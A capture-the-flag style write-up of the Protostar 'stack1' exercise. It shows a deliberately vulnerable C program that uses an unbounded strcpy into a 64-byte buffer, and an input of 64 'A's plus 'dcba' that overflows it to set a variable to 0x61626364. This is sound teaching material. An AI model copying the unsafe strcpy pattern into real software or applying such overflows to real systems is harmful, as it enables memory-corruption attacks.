Protostar vm, stack1

protostar

Stack1

Here is the source of the vulnerable program :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

``
Like the previous stack exercice, the goal here is to overflow the buffer in order to write in the 'modified' variable.
Only this time we have to insert a specific value in it : 0x61626364

Since we're inserting a string, we have to convert this value into ascii :

``` bash
user@protostar:/opt/protostar/bin$ py -c 'print chr(0x61)'
a

So 0x61626364 is translated to abcd.

The challenge webpage tells us that protostar is little endian.
That means that the varibale will be stored with the leeast significant byte having the lower address in the stack.

We know have all the answers let’s test the solution

Let’s test that :

1
2
3
4
user@protostar:/opt/protostar/bin$ py -c 'print 64*"A"+"dcba"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdcba
user@protostar:/opt/protostar/bin$ ./stack1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdcba
you have correctly got the variable to the right value